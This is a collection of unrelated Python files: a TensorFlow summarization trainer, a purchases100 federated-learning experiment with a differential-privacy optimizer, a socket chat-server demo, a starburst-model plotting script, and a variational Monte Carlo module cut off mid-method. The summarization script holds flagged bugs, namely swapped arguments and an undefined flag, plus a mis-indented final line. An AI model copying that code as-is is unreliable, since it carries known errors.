tf.app.flags.DEFINE_integer('checkpoint_secs', 1000, 'How often to checkpoint.')
tf.app.flags.DEFINE_bool('use_bucketing', False,
                         'Whether bucket articles of similar length.')
tf.app.flags.DEFINE_bool('truncate_input', False,
                         'Truncate inputs that are too long. If False, '
                         'examples that are too long are discarded.')
tf.app.flags.DEFINE_integer('random_seed', 111, 'A seed value for randomness.')
def _RunningAvgLoss(loss, running_avg_loss, summary_writer, step, decay=0.999):
    """Calculate the exponentially-decayed running average of losses.

    The average is seeded with the first loss value, clamped at 20 to keep
    the summary plot readable, written to *summary_writer* under the tag
    'running_avg_loss', and echoed to stdout.

    NOTE(review): the call sites in this file invoke this as
    _RunningAvgLoss(running_avg_loss, loss, ...), i.e. with the first two
    arguments swapped relative to this signature — confirm which order is
    intended before relying on the decay semantics.
    """
    if running_avg_loss == 0:
        # First step: adopt the raw loss as the starting average.
        running_avg_loss = loss
    else:
        running_avg_loss = decay * running_avg_loss + (1 - decay) * loss
    running_avg_loss = min(running_avg_loss, 20)
    summary = tf.Summary()
    summary.value.add(tag='running_avg_loss', simple_value=running_avg_loss)
    summary_writer.add_summary(summary, step)
    sys.stdout.write('step %d, running_avg_loss: %f\n' % (step, running_avg_loss))
    return running_avg_loss
def _Train(model, data_batcher):
    """Runs model training.

    Builds the graph on CPU and trains under a tf.train.Supervisor, which
    handles checkpointing (every FLAGS.checkpoint_secs) and periodic summary
    saving.  Loops until the supervisor stops or FLAGS.max_run_steps batches
    have been processed.
    """
    with tf.device('/cpu:0'):
        model.build_graph()
        saver = tf.train.Saver(max_to_keep=10)
        # Train dir is different from log_root to avoid summary directory
        # conflict with Supervisor.
        summary_writer = tf.summary.FileWriter(FLAGS.train_dir)
        sv = tf.train.Supervisor(logdir=FLAGS.log_root,
                                 is_chief=True,
                                 saver=saver,
                                 summary_op=None,
                                 save_summaries_secs=60,
                                 save_model_secs=FLAGS.checkpoint_secs,
                                 global_step=model.global_step)
        sess = sv.prepare_or_wait_for_session(config=tf.ConfigProto(
            allow_soft_placement=True))
        running_avg_loss = 0
        step = 0
        while not sv.should_stop() and step < FLAGS.max_run_steps:
            (article_batch, abstract_batch, enc_probs_batch, enc_labels_batch, targets, article_lens_doc, article_lens_sent, abstract_lens,
             loss_weights, enc_weights_sent, enc_weights_doc, _, _) = data_batcher.NextBatch()
            (_, summaries, loss, train_step) = model.run_train_step(
                sess, article_batch, abstract_batch, enc_probs_batch, enc_labels_batch, targets, article_lens_doc, article_lens_sent,
                abstract_lens, loss_weights, enc_weights_sent, enc_weights_doc)
            summary_writer.add_summary(summaries, train_step)
            # NOTE(review): arguments are passed as (running_avg_loss, loss, ...)
            # while the function signature is (loss, running_avg_loss, ...) —
            # confirm the intended order.
            running_avg_loss = _RunningAvgLoss(
                running_avg_loss, loss, summary_writer, train_step)
            step += 1
            # Flush summaries periodically rather than every batch.
            if step % 100 == 0:
                summary_writer.flush()
        sv.Stop()
def _Eval(model, data_batcher, vocab=None):
    """Runs model eval.

    Endless loop: waits FLAGS.eval_interval_secs, restores the newest
    checkpoint from FLAGS.log_root, scores one batch, tracks the running
    average loss, and snapshots the best-scoring model to
    FLAGS.eval_dir/bestmodel.
    """
    model.build_graph()
    saver = tf.train.Saver()
    summary_writer = tf.summary.FileWriter(FLAGS.eval_dir)
    sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
    running_avg_loss = 0
    step = 0
    bestmodel_save_path = os.path.join(FLAGS.eval_dir, 'bestmodel')
    best_loss = None
    while True:
        # Throttle: give training time to produce new checkpoints.
        time.sleep(FLAGS.eval_interval_secs)
        try:
            ckpt_state = tf.train.get_checkpoint_state(FLAGS.log_root)
        except tf.errors.OutOfRangeError as e:
            tf.logging.error('Cannot restore checkpoint: %s', e)
            continue
        if not (ckpt_state and ckpt_state.model_checkpoint_path):
            tf.logging.info('No model to eval yet at %s', FLAGS.train_dir)
            continue
        tf.logging.info('Loading checkpoint %s', ckpt_state.model_checkpoint_path)
        saver.restore(sess, ckpt_state.model_checkpoint_path)
        (article_batch, abstract_batch, enc_probs_batch, enc_labels_batch, targets, article_lens_doc, article_lens_sent, abstract_lens,
         loss_weights, enc_weights_sent, enc_weights_doc, _, _) = data_batcher.NextBatch()
        (summaries, loss, train_step) = model.run_eval_step(
            sess, article_batch, abstract_batch, enc_probs_batch, enc_labels_batch, targets, article_lens_doc, article_lens_sent,
            abstract_lens, loss_weights, enc_weights_sent, enc_weights_doc)
        # Disabled debug logging, kept as an inert string literal:
        '''
        tf.logging.info(
            'article: %s',
            ' '.join(data.Ids2Words(article_batch[0][0][:].tolist(), vocab)))
        tf.logging.info(
            'abstract: %s',
            ' '.join(data.Ids2Words(abstract_batch[0][:].tolist(), vocab)))
        '''
        summary_writer.add_summary(summaries, train_step)
        # NOTE(review): arguments are passed as (running_avg_loss, loss, ...)
        # while the function signature is (loss, running_avg_loss, ...).
        running_avg_loss = _RunningAvgLoss(
            running_avg_loss, loss, summary_writer, train_step)
        if best_loss is None or running_avg_loss < best_loss:
            tf.logging.info('Found new best model with %.3f running_avg_loss. Saving to %s', running_avg_loss, bestmodel_save_path)
            saver.save(sess, bestmodel_save_path, global_step=train_step, latest_filename='checkpoint_best')
            best_loss = running_avg_loss
        step += 1
        if step % 100 == 0:
            summary_writer.flush()
def _Tag(model, data_batcher, hps, vocab):
    """Runs model tagging.

    For each of 230 batches: restores the latest checkpoint, thresholds the
    per-sentence sigmoid scores at 0.5 into binary extractive labels, and
    appends predicted tags, reference labels, and generated/reference
    abstracts to files under FLAGS.tagging_dir (one line per document).
    """
    model.build_graph()
    saver = tf.train.Saver(max_to_keep=10)
    # NOTE(review): FLAGS.tagging_dir is not DEFINEd in this file — confirm
    # it is registered elsewhere before running in 'tag' mode.
    summary_writer = tf.summary.FileWriter(FLAGS.tagging_dir)
    sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
    running_avg_loss = 0
    step = 0
    while step < 230:
        print("Step: %d" % step)
        time.sleep(FLAGS.eval_interval_secs)
        try:
            ckpt_state = tf.train.get_checkpoint_state(FLAGS.log_root)
        except tf.errors.OutOfRangeError as e:
            tf.logging.error('Cannot restore checkpoint: %s', e)
            continue
        if not (ckpt_state and ckpt_state.model_checkpoint_path):
            tf.logging.info('No model to eval yet at %s', FLAGS.train_dir)
            continue
        tf.logging.info('Loading checkpoint %s', ckpt_state.model_checkpoint_path)
        saver.restore(sess, ckpt_state.model_checkpoint_path)
        (article_batch, abstract_batch, enc_probs_batch, enc_labels_batch, targets, article_lens_doc, article_lens_sent,
         abstract_lens, loss_weights, enc_weights_sent, enc_weights_doc, origin_articles, origin_abstracts) = data_batcher.NextBatch()
        (sigmoid_score, summaries, loss, train_step) = model.run_tagging_step(
            sess, article_batch, abstract_batch, enc_labels_batch, targets, article_lens_doc,
            article_lens_sent, abstract_lens, loss_weights, enc_weights_sent, enc_weights_doc)
        if not os.path.exists(FLAGS.tagging_dir):
            os.mkdir(FLAGS.tagging_dir)
        # Output files are opened in append mode and re-opened every batch.
        tag_file = open(os.path.join(FLAGS.tagging_dir, 'tag'), 'a')
        ref_file = open(os.path.join(FLAGS.tagging_dir, 'ref'), 'a')
        gen_abstract_file = open(os.path.join(FLAGS.tagging_dir, 'gen_abstract'), 'a')
        ref_abstract_file = open(os.path.join(FLAGS.tagging_dir, 'ref_abstract'), 'a')
        origin_abstract_file = open(os.path.join(FLAGS.tagging_dir, 'origin_abstract'), 'a')
        acc = 0
        best_tagging = np.zeros([hps.batch_size, hps.enc_sent_num], dtype=np.float32)  # NOTE(review): appears unused
        for i in range(hps.batch_size):
            tagging_list = []
            ref_list = []
            tagging = []
            ref = []
            for j in range(article_lens_doc[i]):
                # Threshold the per-sentence sigmoid score into a binary tag;
                # tagged sentences form the generated extractive abstract.
                if (sigmoid_score[i][j] >= 0.5):
                    tagging_list.append('1.0')
                    tagging.append(1.0)
                    gen_abstract_file.write(origin_articles[i][j] + ' ')
                else:
                    tagging_list.append('0.0')
                    tagging.append(0.0)
                ref_list.append(str(enc_labels_batch[i][j]))
                ref.append(float(enc_labels_batch[i][j]))
                if (enc_labels_batch[i][j] == 1.0):
                    ref_abstract_file.write(origin_articles[i][j] + ' ')
            # Per-document accuracy: fraction of sentences where tag == label.
            acc += list(np.array(tagging) - np.array(ref)).count(0.0) * 1.0 / len(tagging)
            tag_file.write(' '.join(tagging_list) + '\n')
            ref_file.write(' '.join(ref_list) + '\n')
            gen_abstract_file.write('\n')
            ref_abstract_file.write('\n')
            origin_abstract_file.write(origin_abstracts[i] + '\n')
        origin_abstract_file.close()
        ref_abstract_file.close()
        gen_abstract_file.close()
        ref_file.close()
        tag_file.close()
        summary_writer.add_summary(summaries, train_step)
        running_avg_loss = _RunningAvgLoss(running_avg_loss, loss, summary_writer, train_step)
        # Python 2 print statement: this file targets Python 2.x.
        print "average accuracy: %f" % (acc * 1.0 / hps.batch_size)
        step += 1
        if step % 100 == 0:
            summary_writer.flush()
def main(unused_argv):
    """Builds the vocab, hyper-parameters, batcher and model, then runs the
    stage selected by FLAGS.mode (train / eval / decode / tagging)."""
    vocab = data.Vocab(FLAGS.vocab_path, FLAGS.emb_path, FLAGS.emb_dim, 50000)
    # Check for presence of required special tokens.
    assert vocab.CheckVocab(data.PAD_TOKEN) > 0
    assert vocab.CheckVocab(data.UNKNOWN_TOKEN) >= 0
    assert vocab.CheckVocab(data.SENTENCE_START) > 0
    assert vocab.CheckVocab(data.SENTENCE_END) > 0
    batch_size = 16
    if FLAGS.mode == 'decode':
        # Beam-search decoding uses one batch row per beam.
        batch_size = FLAGS.beam_size
    hps = seq2seq_attention_model.HParams(
        mode=FLAGS.mode,  # train, eval, decode
        min_lr=0.01,  # min learning rate.
        lr=0.15,  # learning rate
        batch_size=batch_size,
        num_labels=2,
        enc_layers_sent=1,
        enc_layers_doc=1,
        enc_sent_num=FLAGS.article_sentences_num,
        max_enc_sent_len=FLAGS.max_article_sentences_length,
        dec_timesteps=FLAGS.abstract_length,
        min_input_len=1,  # discard articles/summaries < than this
        num_hidden=200,  # for rnn cell
        emb_dim=FLAGS.emb_dim,  # If 0, don't use embedding
        para_lambda=100,  # the weight for attention loss
        para_beta=0.5,
        max_grad_norm=2,
        num_softmax_samples=0)  # If 0, no sampled softmax.
    print "initialize batcher......"
    batcher = batch_reader.Batcher(
        FLAGS.article_path, FLAGS.abstract_path, FLAGS.prob_path, FLAGS.label_path, vocab, hps, bucketing=FLAGS.use_bucketing,
        truncate_input=FLAGS.truncate_input)
    tf.set_random_seed(FLAGS.random_seed)
    print "read all batches......"
    # NOTE(review): calling a private Batcher method from outside; presumably
    # this pre-builds all bucketed batches before the run -- confirm against
    # batch_reader.
    batcher._MakeBatchesWithBuckets()
    batcher.CreateNewBuckets()
    if hps.mode == 'train':
        model = seq2seq_attention_model.Seq2SeqAttentionModel(
            hps, vocab)
        _Train(model, batcher)
    elif hps.mode == 'eval':
        model = seq2seq_attention_model.Seq2SeqAttentionModel(
            hps, vocab)
        _Eval(model, batcher, vocab=vocab)
    elif hps.mode == 'decode':
        decode_mdl_hps = hps
        # Only need to restore the 1st step and reuse it since
        # we keep and feed in state for each step's output.
        decode_mdl_hps = hps._replace(dec_timesteps=1)
        model = seq2seq_attention_model.Seq2SeqAttentionModel(
            decode_mdl_hps, vocab)
        decoder = seq2seq_attention_decode.BSDecoder(model, batcher, hps, vocab)
        decoder.DecodeLoop()
    elif hps.mode == 'tagging':
        model = seq2seq_attention_model.Seq2SeqAttentionModel(
            hps, vocab)
        _Tag(model, batcher, hps, vocab=vocab)
if __name__ == '__main__':
tf.app.run() |
import numpy as np
import tensorflow.keras as keras
from sklearn.model_selection import train_test_split
from tensorflow.keras.layers import Dense
from tensorflow.keras.losses import SparseCategoricalCrossentropy
from tensorflow.keras.models import Sequential
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.regularizers import l2
from tensorflow_privacy.privacy.optimizers.dp_optimizer import DPAdamGaussianOptimizer
import tensorflow as tf
from ...entities.datasource import Datasource
from ...entities.experiment import Experiment
from ...entities.global_model import GlobalModel
class GlobalModel_Purchases(GlobalModel):
    """
    A Global model for Purchases classification task
    """

    def __init__(self, output_size=100):
        # output_size: number of purchase classes (100 for purchases100).
        super(GlobalModel_Purchases, self).__init__(output_size)

    def build_model(self):
        """
        Example Architecture for Purchases

        A 4-layer tanh MLP over 600 input features with a softmax head,
        compiled with sparse categorical cross-entropy and Adam.
        :return: the compiled keras Sequential model
        """
        model = Sequential()
        # l2(0) keeps the regularizer hook in place with zero weight decay.
        model.add(Dense(1024, activation="tanh", input_dim=600, kernel_regularizer=l2(0)))
        model.add(Dense(512, activation="tanh", kernel_regularizer=l2(0)))
        model.add(Dense(256, activation="tanh", kernel_regularizer=l2(0)))
        model.add(Dense(128, activation="tanh", kernel_regularizer=l2(0)))
        model.add(Dense(self.output_size, activation='softmax'))
        # from_logits=False because the last layer already applies softmax.
        loss = SparseCategoricalCrossentropy(from_logits=False)
        # NOTE(review): `lr` is a deprecated alias of `learning_rate` in
        # newer Keras releases -- confirm the pinned TF version accepts it.
        model.compile(loss=loss,
                      optimizer=Adam(lr=0.001),
                      metrics=['accuracy'])
        return model
class Purchases(Datasource):
    """
    Some Helper Methods to prepare purchases100 Data
    """

    def __init__(self, alternative_dataset=None):
        """
        Retrieve purchases100 Data

        :param alternative_dataset: optional path to an .npz archive that
            overrides the default shokri purchases100 dump.
        """
        super().__init__()
        print("load datasource purchases")
        DATA = "./data/purchases/100/shokri_purchases_100_classes.npz"
        if alternative_dataset is not None:
            DATA = alternative_dataset
        data = np.load(DATA, allow_pickle=True)
        # x: feature matrix, y: class labels, as stored in the npz archive.
        self.x = data['x']
        self.y = data['y']
        print("datasource data loaded")

    def disjoint_dataset_indices(self, position, num_clients, seed):
        """
        Get disjoint data sets for each party.
        It is important to set the seed and the amount of clients for each party to the same value
        otherwise it is not guaranteed that the sets are disjoint

        :param position: 0 selects the aggregator's share; 1..num_clients-1
            select one client's share of the remaining indices.
        :param num_clients: total number of parties including the aggregator.
        :param seed: RNG seed; must be identical across all parties.
        :return: numpy array of row indices into self.x / self.y.
        """
        # Shokri uses 20k trainingsdata and 50k testdata for the central case. That means a proportion of 2/7
        proportion = 5 / 7
        # Seeding makes the permutation below reproducible across parties.
        np.random.seed(seed)
        indices = np.random.choice(self.x.shape[0], size=self.x.shape[0], replace=False)
        # NOTE(review): no random_state is passed, so this presumably relies
        # on the global numpy RNG seeded above -- confirm determinism across
        # sklearn versions.
        do_indices, ag_indices = train_test_split(indices, test_size=proportion)
        if position == 0:
            return ag_indices
        # Remaining indices are split evenly among the non-aggregator clients.
        batch_size = len(do_indices) // (num_clients - 1)
        position = position - 1  # minus the aggregator
        return do_indices[position * batch_size:(position + 1) * batch_size]
class PurchasesExperiment(Experiment):
    """
    The purchases100 100 experiment
    """

    def __init__(self, args):
        # args: experiment configuration mapping (learning_rate, batch_size,
        # noise_multiplier, norm_clip, output_size, alternative_dataset, ...).
        self.args = args
        super().__init__(self.get_optimizer(), Purchases(args["alternative_dataset"]),
                         lambda: GlobalModel_Purchases(args["output_size"]))

    def get_optimizer(self):
        """
        Build the training configuration.

        :return: dict with 'loss', 'optimizer' (a zero-arg factory) and
            'metrics'. When noise_multiplier > 0 a differentially private
            Adam is used instead of plain Adam.
        """
        optimizer = None
        if self.args["noise_multiplier"] == 0:
            loss = SparseCategoricalCrossentropy(from_logits=False)
            optimizer = lambda: keras.optimizers.Adam(lr=self.args["learning_rate"])
        else:
            # Reduction.NONE keeps per-example losses, which the DP optimizer
            # needs for microbatch clipping and noising.
            loss = SparseCategoricalCrossentropy(from_logits=False, reduction=tf.compat.v1.losses.Reduction.NONE)
            optimizer = lambda: DPAdamGaussianOptimizer(learning_rate=self.args["learning_rate"],
                                                        l2_norm_clip=self.args["norm_clip"],
                                                        noise_multiplier=self.args["noise_multiplier"],
                                                        num_microbatches=self.args["batch_size"],
                                                        unroll_microbatches=True)
        return {'loss': loss,
                'optimizer': optimizer,
                'metrics': ['accuracy']}
|
<filename>PythonBaseDemo/WINSOCKdemo/15.3/Senior/server/server_thread.py
# coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee <EMAIL> #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import CrazyitProtocol
def server_target(s, clients):
    """Per-client service loop for the chat server.

    Reads protocol-framed lines from socket ``s`` and dispatches them as
    login requests, private messages, or broadcasts.

    :param s: the connected client socket.
    :param clients: shared mapping of user name -> socket; must also provide
        ``key_from_value`` and ``remove_by_value`` helpers.
    """
    try:
        while True:
            # Read the next message from the socket.
            line = s.recv(2048).decode('utf-8')
            print(line)
            # A line wrapped in USER_ROUND markers carries a login user name.
            if line.startswith(CrazyitProtocol.USER_ROUND) \
                    and line.endswith(CrazyitProtocol.USER_ROUND):
                # Strip the protocol markers to get the payload.
                user_name = line[CrazyitProtocol.PROTOCOL_LEN:
                                 -CrazyitProtocol.PROTOCOL_LEN]
                if user_name in clients:
                    # Duplicate user name: reject the login.
                    print("重复")
                    s.send(CrazyitProtocol.NAME_REP.encode('utf-8'))
                else:
                    # Login succeeded: register the socket under this name.
                    print("成功")
                    s.send(CrazyitProtocol.LOGIN_SUCCESS.encode('utf-8'))
                    clients[user_name] = s
            # A line wrapped in PRIVATE_ROUND markers is a private message,
            # delivered only to the addressed user's socket.
            elif line.startswith(CrazyitProtocol.PRIVATE_ROUND) \
                    and line.endswith(CrazyitProtocol.PRIVATE_ROUND):
                user_and_msg = line[CrazyitProtocol.PROTOCOL_LEN:
                                    -CrazyitProtocol.PROTOCOL_LEN]
                # Bug fix: split only on the FIRST SPLIT_SIGN so a message
                # body containing the sign is not truncated (the original
                # split(...)[1] dropped everything after a second occurrence).
                user, _, msg = user_and_msg.partition(CrazyitProtocol.SPLIT_SIGN)
                # Look up the target user's socket and deliver the message.
                clients[user].send((clients.key_from_value(s)
                                    + "悄悄地对你说:" + msg).encode('utf-8'))
            # Anything else is a public message: broadcast to every socket.
            else:
                msg = line[CrazyitProtocol.PROTOCOL_LEN:
                           -CrazyitProtocol.PROTOCOL_LEN]
                for client_socket in clients.values():
                    client_socket.send((clients.key_from_value(s)
                                        + "说:" + msg).encode('utf-8'))
    # A socket error means this client is gone: drop it from the registry.
    # `except Exception` (not a bare except) so KeyboardInterrupt/SystemExit
    # still propagate and can shut the server down.
    except Exception:
        clients.remove_by_value(s)
        print(len(clients))
        # Release the network / IO resources.
        if s is not None:
            s.close()
<filename>starbursts/plots/mpl.smoothing_time.py<gh_stars>0
"""
Produces Fig. 2 of Johnson & Weinberg (2019), a 3-column by 2-row plot showing
the effect of outflow smoothing time on the 5-Gyr gas- and efficiency-driven
starburst models. Infall and star formation histories with SFE timescales are
shown in the left-hand panels, [O/Fe]-[Fe/H] tracks in the middle panels, and
stellar [O/Fe] distributions in the right-hand panels.
"""
import visuals # visuals.py -> matplotlib subroutines in this directory
import matplotlib.pyplot as plt
import vice
import sys
import warnings
warnings.filterwarnings("ignore")
def setup_axes():
    """
    Sets up the 3x2 axis grid with the proper axis labels and ranges

    Returns
    =======
    axes :: list
        The axes, indexable via axes[row number][column number]
    """
    axes = visuals.subplots(2, 3, figsize = (21, 14))
    # Common limits for both rows: time axis (col 0), [O/Fe]-[Fe/H] track
    # panel (col 1) and stellar [O/Fe] distribution panel (col 2).
    for i in range(2):
        axes[i][0].xaxis.set_ticks([0, 2, 4, 6, 8, 10])
        axes[i][0].set_xlim([-1, 11])
        axes[i][1].set_xlim([-1.7, 0.2])
        axes[i][1].set_ylim([-0.1, 0.5])
        axes[i][2].set_xlim([-0.1, 0.5])
        axes[i][2].set_ylim([0.2, 50])
    # The top row gets slightly tighter track/distribution ranges.
    axes[0][1].set_ylim([0.0, 0.5])
    axes[0][2].set_xlim([0.0, 0.5])
    # The bottom row gains an extra panel below its first column, shifting
    # the remaining panels right by one index (it becomes a 4-element row).
    axes[1].insert(1, visuals.append_subplot_below(axes[1][0]))
    axes[0][0].set_ylim([-1, 15])
    axes[1][0].set_ylim([-1, 7])
    axes[1][1].set_ylim([0.8, 2.2])
    visuals.set_labels_3axes(axes[0], "O")
    visuals.set_labels_4axes(axes[1], "O")
    return axes
def plot_gas_driven_models(axes):
    """
    Plot the gas-driven starburst models on a set of axes.

    Parameters
    ==========
    axes :: list
        The 1-D list of matplotlib axis objects to plot on
    """
    # (output path, line color, extra keyword args) for each model run.
    runs = [
        ("../../simulations/sudden_5Gyr_5e9Msun_ts0p5", "crimson", {}),
        ("../../simulations/sudden_5Gyr_5e9Msun_ts1p0", "deepskyblue", {}),
        ("../../simulations/sudden_5Gyr_5e9Msun", "black",
            {"second_linestyle": ':'}),
    ]
    for path, color, extra in runs:
        visuals.plot_output_3axes(axes, path, color, "O", **extra)
    # Mark time intervals along the fiducial (no-smoothing) track.
    visuals.plot_track_points_intervals(axes[1],
        vice.history("../../simulations/sudden_5Gyr_5e9Msun"))
def plot_eff_driven_models(axes):
    """
    Plot the efficiency-driven starburst models on a set of axes.

    Parameters
    ==========
    axes :: list
        The 1-D list of matplotlib axis objects to plot on
    """
    # (output path, line color, extra keyword args) for each model run.
    runs = [
        ("../../simulations/SFEdriven_5Gyr_ts0p5", "crimson", {}),
        ("../../simulations/SFEdriven_5Gyr_ts1p0", "deepskyblue", {}),
        ("../../simulations/SFEdriven_5Gyr", "black",
            {"second_linestyle": ':'}),
    ]
    for path, color, extra in runs:
        visuals.plot_output_4axes(axes, path, color, "O", **extra)
    # Mark time intervals along the fiducial (no-smoothing) track.
    visuals.plot_track_points_intervals(axes[2],
        vice.history("../../simulations/SFEdriven_5Gyr"))
def main():
    """
    Produce the figure and save it at the path given by the first CLI
    argument (as a PDF).
    """
    plt.clf()
    axes = setup_axes()
    # Row 0: gas-driven models; row 1: efficiency-driven models.
    plot_gas_driven_models(axes[0])
    plot_eff_driven_models(axes[1])
    visuals.sfr_ifr_legend(axes[0][0])
    legend_colors = ["black", "crimson", "deepskyblue"]
    legend_labels = [r"$\tau_\text{s}$ = 0",
                     r"$\tau_\text{s}$ = 0.5 Gyr",
                     r"$\tau_\text{s}$ = 1 Gyr"]
    visuals.legend(axes[0][-1], legend_colors, legend_labels,
                   loc = "upper right", bbox_to_anchor = (0.99, 0.99))
    for row in axes:
        visuals.yticklabel_formatter(row[-1])
    plt.tight_layout()
    plt.subplots_adjust(right = 0.985)
    plt.savefig(sys.argv[1])
    plt.clf()
|
<gh_stars>0
import typing as t
import warnings
import attr
from cached_property import cached_property
from phd_qmclib.constants import ER
from phd_qmclib.qmc_base import vmc as vmc_udf_base
from phd_qmclib.qmc_base.jastrow import SysConfDistType
from phd_qmclib.qmc_exec import (
exec_logger, proc as proc_base, vmc as vmc_exec
)
from phd_qmclib.qmc_exec.data.vmc import SamplingData
from phd_qmclib.util.attr import (
bool_converter, bool_validator, int_converter, int_validator,
opt_int_converter, opt_int_validator, opt_str_validator, str_validator
)
from .. import model, vmc as vmc_udf
# String to use a ModelSysConfSpec instance as input for a Proc instance.
MODEL_SYS_CONF_TYPE = 'MODEL_SYS_CONF'
model_spec_validator = attr.validators.instance_of(model.Spec)
opt_model_spec_validator = attr.validators.optional(model_spec_validator)
@attr.s(auto_attribs=True, frozen=True)
class ModelSysConfSpec(proc_base.ModelSysConfSpec):
    """Handler to build inputs from system configurations."""

    #: Name of the distribution used to generate system configurations
    #: (must be a member name of SysConfDistType).
    dist_type: str = attr.ib(validator=str_validator)

    #: Optional number of system configurations to generate.
    num_sys_conf: t.Optional[int] = attr.ib(default=None,
                                            validator=opt_int_validator)

    #: A tag to identify this handler.
    type: str = attr.ib(default=None, validator=opt_str_validator)

    def __attrs_post_init__(self):
        """Post initialization stage."""
        # This is the type tag, and must be fixed. object.__setattr__ is
        # needed because the class is frozen.
        object.__setattr__(self, 'type', f'{MODEL_SYS_CONF_TYPE}')

    @classmethod
    def from_config(cls, config: t.Mapping):
        """Build a spec from a configuration mapping.

        :param config: mapping of attribute names to values.
        :return: a new ModelSysConfSpec instance.
        """
        self_config = dict(config)
        return cls(**self_config)

    def dist_type_as_type(self) -> SysConfDistType:
        """Resolve the ``dist_type`` string to a SysConfDistType member.

        :return: the matching enum member; RANDOM when dist_type is None.
        :raises ValueError: if the name is not a SysConfDistType member.
        """
        dist_type = self.dist_type
        if dist_type is None:
            # NOTE(review): str_validator should reject None, so this branch
            # looks unreachable in practice -- kept for safety.
            dist_type_enum = SysConfDistType.RANDOM
        else:
            if dist_type not in SysConfDistType.__members__:
                # Name the offending value instead of raising a bare,
                # message-less ValueError (the original gave no diagnostics).
                raise ValueError(
                    f"unknown dist_type: {dist_type!r}; expected one of "
                    f"{list(SysConfDistType.__members__)}")
            dist_type_enum = SysConfDistType[dist_type]
        return dist_type_enum
@attr.s(auto_attribs=True, frozen=True)
class DensitySpec(proc_base.DensityEstSpec):
    """Density estimator basic config."""

    #: Number of bins used by the density estimator.
    num_bins: int = \
        attr.ib(converter=int_converter, validator=int_validator)
@attr.s(auto_attribs=True, frozen=True)
class SSFEstSpec(proc_base.SSFEstSpec):
    """Structure factor estimator basic config."""

    #: Number of modes evaluated by the static structure factor estimator.
    num_modes: int = \
        attr.ib(converter=int_converter, validator=int_validator)
@attr.s(auto_attribs=True)
class ProcInput(vmc_exec.ProcInput):
    """Represents the input for the VMC calculation procedure."""

    #: The initial sampling state for the VMC procedure.
    state: vmc_udf_base.State

    @classmethod
    def from_model_sys_conf_spec(cls, sys_conf_spec: ModelSysConfSpec,
                                 proc: 'Proc'):
        """Build an input by drawing a fresh system configuration.

        :param sys_conf_spec: spec describing how to draw the configuration.
        :param proc: procedure whose model spec and sampling are used.
        :return: a ProcInput wrapping the freshly built state.
        """
        model_spec = proc.model_spec
        dist_type = sys_conf_spec.dist_type_as_type()
        sys_conf = \
            model_spec.init_get_sys_conf(dist_type=dist_type)
        state = proc.sampling.build_state(sys_conf)
        return cls(state)

    @classmethod
    def from_result(cls, proc_result: 'ProcResult',
                    proc: 'Proc'):
        """Build an input that resumes from a previous procedure result.

        :param proc_result: result whose final state is reused.
        :param proc: procedure the input is intended for.
        :return: a ProcInput wrapping the result's final state.
        """
        state = proc_result.state
        # Resuming only makes sense for the same physical model.
        assert proc.model_spec == proc_result.proc.model_spec
        return cls(state)
class ProcInputError(ValueError):
    """Raised when the input for a VMC calculation procedure is invalid."""
class ProcResult(proc_base.ProcResult):
    """Result of the VMC estimator sampling."""

    # NOTE(review): this definition is immediately shadowed by the attrs-based
    # ProcResult declared right below it, so it is dead code and a candidate
    # for removal. Without @attr.s these annotations generate no __init__.

    #: The last state of the sampling.
    state: vmc_udf_base.State

    #: The sampling object used to generate the results.
    proc: 'Proc'

    #: The data generated during the sampling.
    data: SamplingData
@attr.s(auto_attribs=True, frozen=True)
class ProcResult(proc_base.ProcResult):
    """Result of the VMC estimator sampling."""
    # NOTE(review): the original docstring said "DMC", but this module and
    # the sibling definition above are VMC -- confirmed against vmc_exec use.

    #: The last state of the sampling.
    state: vmc_udf_base.State

    #: The sampling object used to generate the results.
    proc: 'Proc'

    #: The data generated during the sampling.
    data: SamplingData
@attr.s(auto_attribs=True, frozen=True)
class Proc(vmc_exec.Proc):
    """VMC Sampling."""

    #: Physical model specification.
    model_spec: model.Spec = attr.ib(validator=model_spec_validator)

    #: Spread of the random moves proposed by the sampler.
    move_spread: float = attr.ib(converter=float)

    #: Optional seed for the random number generator.
    rng_seed: t.Optional[int] = \
        attr.ib(default=None, converter=opt_int_converter,
                validator=opt_int_validator)

    #: Number of sampling blocks.
    num_blocks: int = \
        attr.ib(default=8, converter=int_converter, validator=int_validator)

    #: Number of sampling steps per block.
    num_steps_block: int = \
        attr.ib(default=4096, converter=int_converter, validator=int_validator)

    #: Optional number of leading blocks discarded as burn-in.
    burn_in_blocks: t.Optional[int] = attr.ib(default=None,
                                              converter=opt_int_converter,
                                              validator=opt_int_validator)

    #: Whether to keep the data of every iteration.
    keep_iter_data: bool = attr.ib(default=False,
                                   converter=bool_converter,
                                   validator=bool_validator)

    # *** Estimators configuration ***

    # TODO: add proper validator.
    #: Optional density estimator configuration.
    density_spec: t.Optional[DensitySpec] = \
        attr.ib(default=None, validator=None)

    #: Optional static structure factor estimator configuration.
    ssf_spec: t.Optional[SSFEstSpec] = \
        attr.ib(default=None, validator=None)

    @classmethod
    def from_config(cls, config: t.Mapping):
        """Build a Proc from a configuration mapping.

        Deprecated aliases (``num_batches``, ``num_steps_batch``,
        ``burn_in_batches``) are accepted and translated to their
        block-based names with a DeprecationWarning.

        :param config: mapping of attribute names to values.
        :return: a new Proc instance.
        """
        self_config = dict(config)
        # Add support for num_batches alias for num_blocks.
        if 'num_batches' in self_config:
            # WARNING ⚠⚠⚠
            warnings.warn("num_batches attribute is deprecated, use "
                          "num_blocks instead", DeprecationWarning)
            # WARNING ⚠⚠⚠
            num_blocks = self_config.pop('num_batches')
            self_config['num_blocks'] = num_blocks
        # Add support for num_steps_batch alias for num_time_steps_block.
        if 'num_steps_batch' in self_config:
            # WARNING ⚠⚠⚠
            warnings.warn("num_steps_batch attribute is deprecated, use "
                          "num_steps_block instead", DeprecationWarning)
            # WARNING ⚠⚠⚠
            nts_block = self_config.pop('num_steps_batch')
            self_config['num_steps_block'] = nts_block
        # Add support for burn_in_batches alias for burn_in_blocks.
        if 'burn_in_batches' in self_config:
            # WARNING ⚠⚠⚠
            warnings.warn("burn_in_batches attribute is deprecated, use "
                          "burn_in_blocks instead", DeprecationWarning)
            # WARNING ⚠⚠⚠
